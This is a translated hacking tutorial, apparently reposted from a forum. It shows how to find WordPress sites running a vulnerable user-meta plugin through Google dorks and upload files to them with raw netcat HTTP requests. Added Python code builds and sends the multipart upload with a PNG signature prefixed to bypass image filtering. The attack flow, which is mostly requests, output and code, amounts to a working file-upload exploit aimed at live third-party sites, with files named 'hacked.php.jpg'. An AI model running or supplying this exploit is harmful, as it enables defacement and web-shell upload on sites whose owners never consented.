http://www.nofiafitri.com/2012/11/swiss-army-knife-for-tcpip-nc.html
Now we'll focus on HTTP attacks only. The bug itself is a generic one; what matters is understanding how the socket exchange works. OK, straight to it...
First I picked a bug from exploit-db, chosen at random.
Then I looked for a vulnerable site in Google's search results using the dork from that advisory, for example:
- inurl:/wp-content/plugins/user-meta/framework/helper/uploader.php -source -trunk
- intext:user-meta -source -trunk
Just pick an easy one.
Try opening the page with an ordinary GET request through netcat (type the request line and headers, then finish with an empty line so the server knows the headers are complete):
Code:
C:\Users\ANASKI>nc www.victim.com 80
GET /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Connection: keep-alive
I received this response from the site:
Code:
HTTP/1.1 200 OK
Date: Mon, 01 Oct 2012 07:15:49 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl1-gentoo
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
23
{"error":"No files were uploaded."}
0
Oops, we have already learned a few things about the target: the Server and X-Powered-By headers reveal Apache 2.2.20, OpenSSL 0.9.8o and PHP 5.2.13, and the uploader answered an unauthenticated request with its own JSON error instead of a login page or redirect, so it requires no authorization.
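To make sense of what nc printed, here is an added example (my own Python, not code from the original post or from the user-meta plugin) that splits a raw HTTP/1.1 response into status line, headers and body and decodes the chunked body. The sample response is the capture above re-typed as a constant with CRLF line endings, so the script runs offline.

```python
# Added example: parse a raw HTTP/1.1 response as printed by netcat, including
# the chunked transfer-encoding. CHUNKED_RESPONSE is the capture from the post,
# reconstructed here with CRLF line endings (constructed sample, not live data).

CHUNKED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Oct 2012 07:15:49 GMT\r\n"
    b"Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o\r\n"
    b"X-Powered-By: PHP/5.2.13-pl1-gentoo\r\n"
    b"Vary: Accept-Encoding,User-Agent\r\n"
    b"Keep-Alive: timeout=15, max=100\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"23\r\n"
    b'{"error":"No files were uploaded."}\r\n'
    b"0\r\n"
    b"\r\n"
)


def split_response(raw: bytes):
    """Split a raw response into (status_line, headers, body).
    Header names are lower-cased: HTTP header names are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            # A header line without ':' is exactly what Apache rejects with a 400.
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode a chunked body: each chunk is '<hex size>[;ext]\\r\\n<data>\\r\\n',
    terminated by a zero-size chunk. The '23' line in the capture is 0x23 = 35 bytes."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.index(b"\r\n", pos)
        size_field = body[pos:nl].split(b";", 1)[0].strip()   # drop chunk extensions
        size = int(size_field, 16)
        pos = nl + 2
        if size == 0:
            break  # last chunk; optional trailers follow and are ignored here
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2
    return bytes(out)


def fingerprint(raw: bytes):
    """Return what the first netcat request taught us: status code, leaked
    software versions and the decoded body."""
    status, headers, body = split_response(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = decode_chunked(body)
    return {
        "status": int(status.split()[1]),
        "server": headers.get("server"),
        "powered_by": headers.get("x-powered-by"),
        "body": body.decode("utf-8"),
    }


if __name__ == "__main__":
    print(fingerprint(CHUNKED_RESPONSE))
```

The `23` and `0` lines in the capture are chunk sizes in hex, not part of the page body: 0x23 = 35 bytes, exactly the length of the JSON, and the `0` chunk terminates the body. Header names are matched case-insensitively, which is also why the `Content-length` spelling in the POST further down is accepted.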
Now let's try uploading a file to that target.
First look at the HTML form the uploader expects:
Code:
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="qq" />
<input type="submit" />
</form>
then we rebuild it as a raw request in nc:
Code:
C:\Users\ANASKI>nc www.victim.com 80
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Referer: http://victim.com/user-meta.php
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-length: 204
-----------------------------41184676334
Content-Disposition: form-data; name="qqfile"; filename="exp.php.jpeg"
Content-Type: sound/midi
Hacked by Tester
-----------------------------41184676334--
The server answered:
Code:
HTTP/1.1 400 Bad Request
Date: Mon, 01 Oct 2012 07:46:25 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
Content-Length: 475
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1</pre>
</p>
<hr>
<address>Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o Server at victim.com Port 80</address>
</body></html>
So there was a mistake in how I typed the request into nc. The 400 comes from Apache itself: it rejects a header line that is not in Name: value form before the request ever reaches PHP, so nothing in the body matters until the framing is right. (This attempt also used the field name qqfile, whereas the form field is named qq; the retry below uses qq.)
We check the request again and retry until the syntax is correct.
For the error codes I have made a list:
Let's test again:
Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 208
-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg
hacked by tester
-----------------------------23281168279961--
This time it was accepted, so we keep a copy of that working request.
Now let's try to bypass the image filter, for example by putting a GIF/JPEG/PNG file signature in front of the payload. In the request below the ‰ is how the 0x89 lead byte of the PNG signature (89 50 4E 47 0D 0A 1A 0A) is displayed in Windows-1252; nc sends whatever bytes are typed or piped in, so the Content-Length grows by however many bytes the prefix really is:
Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 214
-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg
‰PNG hacked by tester
-----------------------------23281168279961--
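Hand-counting the body and keeping the boundary, its `--` prefix and every CRLF straight is the error-prone part of doing this in nc. As an added example (my own Python, not code from the original post or the plugin), here is the same request assembled programmatically: the multipart body is built from the form's field name, the Content-Length is taken from the actual byte count, and an image signature can be prepended to the payload, as in the ‰PNG attempt above. The host, path and boundary digits are this page's placeholders; `send_raw` is a small helper I added in place of `nc`, for use only against hosts you are authorised to test.

```python
import socket

# Added example: build the multipart/form-data POST from the post programmatically.
# Host, path and boundary digits are the placeholders used on the page; send_raw is
# an assumed helper standing in for "nc host 80" and is not run offline.

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # full 8-byte PNG header; 0x89 is shown as ‰ in Windows-1252
GIF_SIGNATURE = b"GIF89a"
JPEG_SIGNATURE = b"\xff\xd8\xff\xe0"


def build_multipart(boundary: str, field: str, filename: str, content_type: str, data: bytes) -> bytes:
    """One file part, encoded as a browser would for <input type="file" name="qq">.
    The delimiter lines are '--' + boundary; the closing one adds a trailing '--'."""
    return (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        "\r\n"
    ).encode("latin-1") + data + f"\r\n--{boundary}--\r\n".encode("latin-1")


def build_post(host: str, path: str, boundary: str, body: bytes) -> bytes:
    """Request line, headers, blank line, body. Every header is 'Name: value'
    (Apache's 400 above was a header line without the ':' separator), and
    Content-Length is computed from the body instead of counted by hand."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1",
        "Connection: close",   # unlike the page's keep-alive, so recv() ends at EOF
        f"Content-Type: multipart/form-data; boundary={boundary}",
        f"Content-Length: {len(body)}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("latin-1") + body


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """What 'nc host 80 < request.txt' does: open a TCP socket, write the bytes,
    read until the server closes the connection. Assumed helper, not run offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            buf = s.recv(4096)
            if not buf:
                break
            chunks.append(buf)
    return b"".join(chunks)


if __name__ == "__main__":
    # Firefox-style boundary: 27 hyphens followed by the digits from the page.
    boundary = "-" * 27 + "23281168279961"
    plain = build_multipart(boundary, "qq", "hacked.php.jpg", "image/jpeg", b"hacked by tester")
    spoofed = build_multipart(boundary, "qq", "hacked.php.jpg", "image/jpeg",
                              PNG_SIGNATURE + b"hacked by tester")
    req = build_post("www.victim.com",
                     "/wp-content/plugins/user-meta/framework/helper/uploader.php",
                     boundary, spoofed)
    print(req.decode("latin-1"))
    # print(send_raw("www.victim.com", 80, req))   # only against a host you may test
```

With the page's values the plain body comes out at exactly 208 bytes, the same Content-Length the author arrived at by hand, and the full 8-byte PNG signature adds 8 more. A filter that only checks the filename extension or the part's Content-Type will accept either body; one that actually decodes the file as an image will not, because there is no PNG data behind the signature.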
source: http://devilzc0de.org/forum/thread-16855.html